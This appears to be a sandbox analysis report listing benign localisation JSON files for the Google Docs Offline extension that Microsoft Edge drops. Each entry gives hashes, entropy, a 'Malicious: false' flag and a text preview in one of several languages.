Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):806
Entropy (8bit):4.815663786215102
Encrypted:false
SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
MD5:A86407C6F20818972B80B9384ACFBBED
SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
Malicious:false
Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):883
                                                                                                                                                            Entropy (8bit):4.5096240460083905
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                            MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                            SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                            SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                            SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1031
                                                                                                                                                            Entropy (8bit):4.621865814402898
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                            MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                            SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                            SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                            SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1613
                                                                                                                                                            Entropy (8bit):4.618182455684241
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                            MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                            SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                            SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                            SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):851
                                                                                                                                                            Entropy (8bit):4.4858053753176526
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                            MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                            SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                            SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                            SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):851
                                                                                                                                                            Entropy (8bit):4.4858053753176526
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                            MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                            SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                            SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                            SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):848
                                                                                                                                                            Entropy (8bit):4.494568170878587
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                            MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                            SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                            SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                            SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1425
                                                                                                                                                            Entropy (8bit):4.461560329690825
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                            MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                            SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                            SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                            SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):961
                                                                                                                                                            Entropy (8bit):4.537633413451255
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                            MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                            SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                            SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                            SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                            Malicious:false
Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):959
Entropy (8bit):4.570019855018913
Encrypted:false
SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
MD5:535331F8FB98894877811B14994FEA9D
SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
Malicious:false
Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):968
Entropy (8bit):4.633956349931516
Encrypted:false
SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
MD5:64204786E7A7C1ED9C241F1C59B81007
SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
Malicious:false
Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):838
Entropy (8bit):4.4975520913636595
Encrypted:false
SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
MD5:29A1DA4ACB4C9D04F080BB101E204E93
SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
Malicious:false
Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1305
Entropy (8bit):4.673517697192589
Encrypted:false
SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
Malicious:false
Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):911
Entropy (8bit):4.6294343834070935
Encrypted:false
SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
Malicious:false
Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):939
Entropy (8bit):4.451724169062555
Encrypted:false
SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
MD5:FCEA43D62605860FFF41BE26BAD80169
SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
Malicious:false
Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):977
Entropy (8bit):4.622066056638277
Encrypted:false
SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
Malicious:false
Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):972
Entropy (8bit):4.621319511196614
Encrypted:false
SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
MD5:6CAC04BDCC09034981B4AB567B00C296
SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
Malicious:false
Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):990
Entropy (8bit):4.497202347098541
Encrypted:false
SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
Malicious:false
